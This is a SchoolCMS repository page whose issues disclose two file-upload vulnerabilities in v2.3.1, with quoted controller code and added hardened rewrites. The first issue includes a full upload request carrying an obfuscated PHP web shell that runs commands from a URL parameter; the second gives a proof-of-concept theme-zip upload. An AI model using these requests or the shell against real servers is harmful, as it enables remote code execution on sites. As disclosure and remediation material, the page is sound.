gongfuxiang / schoolcms
The first open-source school academic-affairs management system: automated site layout, students / grades / teachers, grade lookup.

License: Apache License 2.0

PHP 41.07% HTML 9.49% PLpgSQL 3.03% JavaScript 32.50% CSS 13.74% Smarty 0.18%
school

schoolcms's People

Contributors

gongfuxiang


schoolcms's Issues

SchoolCMS v2.3.1 has a file upload vulnerability

Detail:


HTTP:

POST /admin.php?m=Admin&c=Site&a=Save HTTP/1.1
Host: schoolcms.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------20557339626727
Content-Length: 2437
Origin: http://schoolcms.com
Connection: close
Referer: http://schoolcms.com/admin.php?m=Admin&c=Site&a=Index
Cookie: PHPSESSID=7hb5r5vqt11i3m5l3hojh68rf2; think_language=zh-CN

-----------------------------20557339626727
Content-Disposition: form-data; name="max_file_size"

2047997
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_name"

SchoolCMS
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_logo_img"; filename="test.php"
Content-Type: text/php

<?php
$shang='tpY<$*'^"\x15\x3\x2a\x59\x56\x5e";

@$shang($_GET['a']);
?>
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_logo"

/Public/Upload/Home/image/home_logo.php
-----------------------------20557339626727
Content-Disposition: form-data; name=""


-----------------------------20557339626727
Content-Disposition: form-data; name="home_max_limit_image"

2047997
-----------------------------20557339626727
Content-Disposition: form-data; name="home_max_limit_file"

51200000
-----------------------------20557339626727
Content-Disposition: form-data; name="home_max_limit_video"

102400000
-----------------------------20557339626727
Content-Disposition: form-data; name="home_content_max_width"

1200
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_close_reason"

升级中...
-----------------------------20557339626727
Content-Disposition: form-data; name=""


-----------------------------20557339626727
Content-Disposition: form-data; name="common_verify_expire_time"

600
-----------------------------20557339626727
Content-Disposition: form-data; name="common_verify_time_interval"

30
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_icp"

1111
-----------------------------20557339626727
Content-Disposition: form-data; name="home_footer_info"

111
-----------------------------20557339626727
Content-Disposition: form-data; name="common_timezone"

Asia/Shanghai
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_state"

1
-----------------------------20557339626727
Content-Disposition: form-data; name="home_user_login_state"

1
-----------------------------20557339626727
Content-Disposition: form-data; name="home_img_verify_state"

1
-----------------------------20557339626727
Content-Disposition: form-data; name="home_user_reg_state"

sms,email
-----------------------------20557339626727--


code: WWW\schoolcms\Application\Admin\Controller\SiteController.class.php


	public function Save()
	{
		// Site logo
		if(isset($_FILES['home_site_logo_img']['error']))
		{
			// File upload validation
			$error = FileUploadError('home_site_logo_img');
			if($error !== true)
			{
				$this->ajaxReturn($error, -1);
			}

			// File type (suffix is taken from the client-supplied MIME type)
			list($type, $suffix) = explode('/', $_FILES['home_site_logo_img']['type']);
			$path = 'Public/Upload/Home/image/';
			if(!is_dir($path))
			{
				mkdir(ROOT_PATH.$path, 0777, true);
			}
			$filename = 'home_logo.'.$suffix;
			$home_site_logo = $path.$filename;
			if(move_uploaded_file($_FILES['home_site_logo_img']['tmp_name'], ROOT_PATH.$home_site_logo))
			{
				$_POST['home_site_logo'] = '/'.$home_site_logo;
			}
		}

		// Site state value handling
		if(!isset($_POST['home_user_reg_state']))
		{
			$_POST['home_user_reg_state'] = '';
		}

		// Basic configuration
		$this->MyConfigSave();
	}
}
?>

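A hardened version of the logo-upload step, added here as an example; it is not part of the issue above or of SchoolCMS's code. LOGO_ALLOWED, safe_logo_destination and the upload directory are assumptions; the stored extension is chosen from a server-side table keyed on the sniffed MIME type, never from $_FILES[...]['type'].

```php
<?php
// Added example, not SchoolCMS code: the logo upload step with the stored extension chosen
// server-side. The original builds 'home_logo.'.$suffix from $_FILES[...]['type'], which the
// client controls (the report above sends "text/php"). Assumes PHP 7.1+ with ext-fileinfo.

// Detected MIME type => extension we store under. Anything else is rejected (assumed policy).
const LOGO_ALLOWED = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

// Return the safe destination path for an uploaded logo, or null if the upload must be rejected.
// $file is one $_FILES entry; $uploadDir is the absolute target directory (assumed to exist).
function safe_logo_destination(array $file, string $uploadDir): ?string
{
    if (!isset($file['error'], $file['tmp_name']) || $file['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return null; // only files PHP itself received through this POST
    }
    // Never consult $file['type'] or the client filename: sniff the uploaded bytes.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(LOGO_ALLOWED[$detected])) {
        return null; // e.g. text/x-php, text/plain, application/octet-stream
    }
    // Independent second check: the bytes must decode as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }
    // Fixed basename; the extension comes from our table, never from the request.
    return rtrim($uploadDir, '/') . '/home_logo.' . LOGO_ALLOWED[$detected];
}

// Inside Save(), replacing the explode()/move_uploaded_file() sequence of the original:
//   $dest = safe_logo_destination($_FILES['home_site_logo_img'] ?? [], ROOT_PATH . 'Public/Upload/Home/image');
//   if ($dest === null) { $this->ajaxReturn('invalid logo image', -1); }
//   move_uploaded_file($_FILES['home_site_logo_img']['tmp_name'], $dest);
// The upload directory should also be served with PHP execution disabled, so that a
// bypass of these checks cannot turn a stored file into executable code.
```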

SchoolCMS v2.3.1 file upload and unzip vulnerability


Detail:


POST /schoolcms/admin.php?m=admin&c=theme&a=upload HTTP/1.1
Host: 127.0.0.1
Content-Length: 502
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzvqqC1ZAHhAnw74R
Referer: http://127.0.0.1/schoolcms/admin.php?m=admin&c=theme&a=index&view_type=upload
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tiamjbmuiknb087jko5umifkq0; think_language=zh-CN
Connection: close

------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="max_file_size"

51200000
------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="theme"; filename="test_Static.zip"
Content-Type: application/x-zip-compressed

���

c=theme -> Controller=theme, a=upload -> action=upload. /schoolcms/Application/Admin/Controller/ThemeController.class.php Line 180:

	public function Upload()
	{
		// Is this an AJAX request?
		if(!IS_AJAX)
		{
			$this->error(L('common_unauthorized_access'));
		}

		// File upload validation
		$error = FileUploadError('theme');
		if($error !== true)
		{
			$this->ajaxReturn($error, -1);
		}

		// File format validation (uses the client-supplied MIME type)
		$type = array('application/zip', 'application/octet-stream');
		if(!in_array($_FILES['theme']['type'], $type))
		{
			$this->ajaxReturn(L('theme_upload_error'), -2);
		}

		// Start extracting the archive
		$resource = zip_open($_FILES['theme']['tmp_name']);
		while(($temp_resource = zip_read($resource)) !== false)
		{
			if(zip_entry_open($resource, $temp_resource))
			{
				// Name of the current entry in the archive
				$file = zip_entry_name($temp_resource);

				// Exclude temporary files and directories
				if(strpos($file, '/.') === false && strpos($file, '__') === false)
				{
					// Build the path
					if(strpos($file, '_Html') !== false)
					{
						$file = $this->html_path.$file;
					} else if(strpos($file, '_Static') !== false)
					{
						$file = $this->static_path.$file;
					} else {
						continue;
					}
					$file = str_replace(array('_Static/', '_Html/'), '', $file);

					// Extract the directory part of the path
					$file_path = substr($file, 0, strrpos($file, '/'));

					// Create the directory if it does not exist
					if(!is_dir($file_path))
					{
						mkdir($file_path, 0777, true);
					}

					// Write the file if it is not a directory
					if(!is_dir($file))
					{
						// Read this entry
						$file_size = zip_entry_filesize($temp_resource);
						$file_content = zip_entry_read($temp_resource, $file_size);
						file_put_contents($file, $file_content);
					}
					// Close the entry
					zip_entry_close($temp_resource);
				}

			}
		}
		$this->ajaxReturn(L('common_operation_success'));
	}
}

Check of the Content-Type: the default is "application/x-zip-compressed", which is not in the array.

		// File format validation
		$type = array('application/zip', 'application/octet-stream');
		if(!in_array($_FILES['theme']['type'], $type))
		{
			$this->ajaxReturn(L('theme_upload_error'), -2);
		}

Unzip and check the filename: if the filename does not contain "_Html" or "_Static", it jumps to the next loop iteration.

		while(($temp_resource = zip_read($resource)) !== false)
		{
			if(zip_entry_open($resource, $temp_resource))
			{
				// Name of the current entry in the archive
				$file = zip_entry_name($temp_resource);

				// Exclude temporary files and directories
				if(strpos($file, '/.') === false && strpos($file, '__') === false)
				{
					// Build the path
					if(strpos($file, '_Html') !== false)
					{
						$file = $this->html_path.$file;
					} else if(strpos($file, '_Static') !== false)
					{
						$file = $this->static_path.$file;
					} else {
						continue;
					}

html_path, static_path: Line 14

	private $html_path;
	private $static_path;

	/**
	 * [_initialize pre-action: inherits the common pre-action method]
	 * @author   Devil
	 * @blog     http://gong.gg/
	 * @version  0.0.1
	 * @datetime 2016-12-03T12:39:08+0800
	 */
	public function _initialize()
	{
		// Call the parent pre-action
		parent::_initialize();

		// Login check
		$this->Is_Login();

		// Permission check
		$this->Is_Power();

		// Static directory and html directory
		$this->html_path = 'Application'.DS.'Home'.DS.'View'.DS;
		$this->static_path = 'Public'.DS.'Home'.DS;
	}

DS: /schoolcms/core.php Line 47

/* Define the system directory separator */
define('DS', DIRECTORY_SEPARATOR);

static_path = '\Public\Home\'

Write to file:

$file_size = zip_entry_filesize($temp_resource);
$file_content = zip_entry_read($temp_resource, $file_size);
file_put_contents($file, $file_content);

POC:

Set Content-Type=application/zip and filename=test_Static.php


POST /schoolcms/admin.php?m=admin&c=theme&a=upload HTTP/1.1
Host: 127.0.0.1
Content-Length: 489
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzvqqC1ZAHhAnw74R
Referer: http://127.0.0.1/schoolcms/admin.php?m=admin&c=theme&a=index&view_type=upload
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tiamjbmuiknb087jko5umifkq0; think_language=zh-CN
Connection: close

------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="max_file_size"

51200000
------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="theme"; filename="test_Static.zip"
Content-Type: application/zip

���

Upload success:

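Theme extraction with the checks the Upload() action above lacks, added here as an example that is not part of the issue or of SchoolCMS's code: the archive type is sniffed from the file bytes instead of $_FILES['theme']['type'], every entry name is checked before a path is built from it, and only entries with an allowlisted extension are written. THEME_ALLOWED_EXT, theme_entry_target, extract_theme and the $base directory are assumptions.

```php
<?php
// Added example, not SchoolCMS code. Assumes PHP 7.1+ with ext-zip and ext-fileinfo;
// ZipArchive replaces the zip_open()/zip_read() API, which is deprecated since PHP 8.0.
// The allowlist below is an assumed policy: it deliberately contains no executable extension.
const THEME_ALLOWED_EXT = ['css', 'js', 'png', 'jpg', 'gif', 'svg', 'html'];
// Map a zip entry name to its relative target path, or null if the entry must be skipped.
function theme_entry_target(string $entry): ?string
{
    // Reject absolute paths, backslashes, NUL bytes and any ".." segment.
    if ($entry === '' || $entry[0] === '/' || strpbrk($entry, "\\\0") !== false
        || in_array('..', explode('/', $entry), true)) {
        return null;
    }
    // Same routing as the original: "_Html" entries go to the view dir, "_Static" to Public/Home.
    if (strpos($entry, '_Html') !== false) {
        $root = 'Application/Home/View/';
    } elseif (strpos($entry, '_Static') !== false) {
        $root = 'Public/Home/';
    } else {
        return null;
    }
    $rel = str_replace(['_Static/', '_Html/'], '', $entry);
    if ($rel === '' || substr($rel, -1) === '/') {
        return null; // directory entries: parents are created on demand in extract_theme()
    }
    $ext = strtolower(pathinfo($rel, PATHINFO_EXTENSION));
    // A .php or .phtml entry is dropped here, whatever marker its name carries.
    return in_array($ext, THEME_ALLOWED_EXT, true) ? $root . $rel : null;
}
// Extract $zipPath under $base (absolute directory, assumed); returns the files written.
function extract_theme(string $zipPath, string $base): array
{
    // Sniff the uploaded bytes; the client's Content-Type header is never consulted.
    if ((new finfo(FILEINFO_MIME_TYPE))->file($zipPath) !== 'application/zip') { throw new RuntimeException('not a zip archive'); }
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) { throw new RuntimeException('cannot open archive'); }
    $written = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $rel = theme_entry_target($zip->getNameIndex($i));
        if ($rel === null) { continue; }
        $dest = rtrim($base, '/') . '/' . $rel;
        is_dir(dirname($dest)) || mkdir(dirname($dest), 0755, true);
        file_put_contents($dest, $zip->getFromIndex($i));
        $written[] = $dest;
    }
    $zip->close();
    return $written;
}
```

Called from Upload() as extract_theme($_FILES['theme']['tmp_name'], ROOT_PATH) after FileUploadError(), this replaces the in_array() type check and the zip_read() loop; the returned list is what the action should report, so an archive whose entries were all skipped is visible as such.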

PHP 7 problem

Hello, under PHP 7 the installer always reports that the database connection failed. What is going on?
